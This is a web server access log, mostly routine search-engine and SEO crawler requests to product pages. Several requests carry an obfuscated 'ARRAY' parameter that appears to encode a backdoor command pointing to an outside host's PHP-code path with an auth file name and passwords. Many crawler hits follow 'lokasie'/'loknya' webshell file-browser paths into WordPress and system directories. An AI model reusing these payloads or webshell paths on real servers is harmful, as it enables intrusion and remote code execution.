66.249.72.69 - - [21/Jul/2026:14:03:40 +0000] "GET /detail/4502623166 HTTP/1.1" 200 29691 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.70 - - [21/Jul/2026:14:03:41 +0000] "GET /detail/1326916624 HTTP/1.1" 200 31624 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.250.235.158 - - [21/Jul/2026:14:01:42 +0000] "GET /?ARRAY=7o2230223n313738343634363130322p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634323530322q6533363062646363653531663663396132313864623532326131663934653736222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
66.249.72.69 - - [21/Jul/2026:14:03:42 +0000] "GET /detail/6504267360 HTTP/1.1" 200 30751 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:14:03:43 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-block-templates-registry.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 3402 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.70 - - [21/Jul/2026:14:03:44 +0000] "GET /detail/4835494550 HTTP/1.1" 200 29375 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:14:03:44 +0000] "GET /detail/3990733579 HTTP/1.1" 200 30101 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:14:03:45 +0000] "GET /detail/2248138863 HTTP/1.1" 200 30530 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
92.222.104.193 - - [21/Jul/2026:14:02:39 +0000] "GET /items/B396017464/ HTTP/2" 404 3166 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
94.23.188.199 - - [21/Jul/2026:14:02:47 +0000] "GET /items/B395996659/ HTTP/2" 404 3165 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
192.250.235.158 - - [21/Jul/2026:14:00:58 +0000] "GET /?ARRAY=7o2230223n313738343634363035382p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634323435382q3732373737646139303635613064346539373837613465333139316266303233222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
74.7.241.56 - - [21/Jul/2026:14:03:14 +0000] "GET /index.php?loknya=/usr/lib64/gtk-3.0 HTTP/2" 429 0 "https://www.laundrybandung.id/index.php?loknya=/usr/lib64" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
51.68.247.206 - - [21/Jul/2026:14:03:19 +0000] "GET /items/B395980180/ HTTP/2" 404 3164 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
192.250.235.158 - - [21/Jul/2026:14:01:20 +0000] "GET /?ARRAY=7o2230223n313738343634363038302p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634323438302q3832343964386265333263633165383035626364333637636361656162656166222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
66.249.72.70 - - [21/Jul/2026:14:03:22 +0000] "GET /detail/1314190221 HTTP/1.1" 200 29885 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.0.53 - - [21/Jul/2026:14:03:26 +0000] "GET /items/B395284186/ HTTP/2" 429 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
66.249.72.70 - - [21/Jul/2026:14:03:41 +0000] "GET /detail/1816010882 HTTP/1.1" 200 29951 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.70 - - [21/Jul/2026:14:03:43 +0000] "GET /detail/2993263564 HTTP/1.1" 200 29502 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.70 - - [21/Jul/2026:14:03:44 +0000] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=39293710 HTTP/1.1" 200 29614 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:14:03:46 +0000] "GET /phylum/belonging/fpdfae1bqu5r03m.htm HTTP/1.1" 200 30599 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:14:03:46 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fglobal-styles-and-settings.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 7316 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:14:03:47 +0000] "GET /detail/6231711516 HTTP/1.1" 200 29715 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.71 - - [21/Jul/2026:14:03:48 +0000] "GET /detail/2891799241 HTTP/1.1" 200 30249 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:14:03:49 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fcontribute.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 3634 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.71 - - [21/Jul/2026:14:03:50 +0000] "GET /detail/4140925246 HTTP/1.1" 200 30004 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:14:03:52 +0000] "GET /detail/4068637894 HTTP/1.1" 200 31349 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:14:03:52 +0000] "GET /sitemap-15.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fms-sites.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 1646 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:14:03:53 +0000] "GET /detail/809512993 HTTP/1.1" 200 29953 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:14:03:55 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Foptions-discussion.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 6350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:03:58 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fpost-new.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 2575 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:04:01 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fcanonical.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 10951 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.64 - - [21/Jul/2026:14:04:02 +0000] "GET /detail/2589833809 HTTP/1.1" 200 29747 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.70 - - [21/Jul/2026:14:04:03 +0000] "GET /detail/1273163098 HTTP/1.1" 200 31504 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.70 - - [21/Jul/2026:14:03:46 +0000] "GET /detail/86587029 HTTP/1.1" 200 30298 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.68.247.197 - - [21/Jul/2026:14:03:50 +0000] "GET /items/B395833157/ HTTP/2" 404 3165 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.72.64 - - [21/Jul/2026:14:04:00 +0000] "GET /detail/6857615070 HTTP/1.1" 200 29848 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:14:04:04 +0000] "GET /detail/4905743429 HTTP/1.1" 200 31331 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:14:04:06 +0000] "GET /detail/1305333262 HTTP/1.1" 200 30047 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:14:04:08 +0000] "GET /detail/3568499099 HTTP/1.1" 200 29684 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:14:04:09 +0000] "GET /detail/3016207304 HTTP/1.1" 200 29922 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:14:04:11 +0000] "GET /detail/5857922196 HTTP/1.1" 200 29910 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.70 - - [21/Jul/2026:14:04:11 +0000] "GET /detail/2637366412 HTTP/1.1" 200 29659 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.70 - - [21/Jul/2026:14:04:13 +0000] "GET /detail/5092372282 HTTP/1.1" 200 30212 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:14:04:14 +0000] "GET /detail/3618745669 HTTP/1.1" 200 29565 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:14:04:15 +0000] "GET /detail/1373699921 HTTP/1.1" 200 29620 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.69 - - [21/Jul/2026:14:04:16 +0000] "GET /detail/4288259312 HTTP/1.1" 200 30352 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.70 - - [21/Jul/2026:14:04:16 +0000] "GET /detail/6175360292 HTTP/1.1" 200 29823 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.250.235.158 - - [21/Jul/2026:14:02:04 +0000] "GET /?ARRAY=7o2230223n313738343634363132342p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634323532342q6130343230323839633938343034383535363365633831343632653438666435222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
216.73.216.117 - - [21/Jul/2026:14:04:04 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-user-meta-session-tokens.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2378 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.71 - - [21/Jul/2026:14:04:06 +0000] "GET /detail/6385401414 HTTP/1.1" 200 29652 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
176.31.139.15 - - [21/Jul/2026:14:04:06 +0000] "GET /items/B395825725/ HTTP/2" 404 3163 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:14:04:07 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fcredits.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 2955 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:04:10 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fupgrade.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 3731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:04:13 +0000] "GET /sitemap-15.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fprivacy.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:04:16 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Ffonts.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 4300 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:04:19 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fms-files.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2737 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:04:22 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fabout.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 6770 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:04:25 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-simplepie-sanitize-kses.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2426 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.250.235.158 - - [21/Jul/2026:14:02:26 +0000] "GET /?ARRAY=7o2230223n313738343634363134362p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343634323534362q6266303738393264343439653935616364333162366435303664616639333766222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
216.73.216.117 - - [21/Jul/2026:14:04:28 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Ferror_log&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 1796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:04:31 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fmedia-upload.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 3004 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:04:34 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fview-transitions.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 1796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:04:37 +0000] "GET /sitemap-9.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fuser-new.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 8564 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:04:40 +0000] "GET /sitemap-17.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fview-transitions.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 1796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:04:43 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-duotone.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 11575 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:04:46 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-widget-factory.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2520 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:04:49 +0000] "GET /sitemap-17.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-widget-factory.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2520 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:04:52 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Finstall-helper.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 3498 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
92.222.104.208 - - [21/Jul/2026:14:04:53 +0000] "GET /items/B395706960/ HTTP/2" 404 3166 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:14:04:56 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-matchesmapregex.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2189 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.56 - - [21/Jul/2026:14:04:17 +0000] "GET /index.php?loknya=/usr/lib64/gtk-2.0 HTTP/2" 429 0 "https://www.laundrybandung.id/index.php?loknya=/usr/lib64" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
176.31.139.15 - - [21/Jul/2026:14:04:22 +0000] "GET /items/B395725906/ HTTP/2" 404 3163 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.72.69 - - [21/Jul/2026:14:04:22 +0000] "GET /detail/1173077801 HTTP/1.1" 200 30768 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
57.141.0.13 - - [21/Jul/2026:14:04:33 +0000] "GET /items/B397297502/ HTTP/2" 429 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
5.39.1.230 - - [21/Jul/2026:14:04:37 +0000] "GET /items/B395717776/ HTTP/2" 404 3166 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
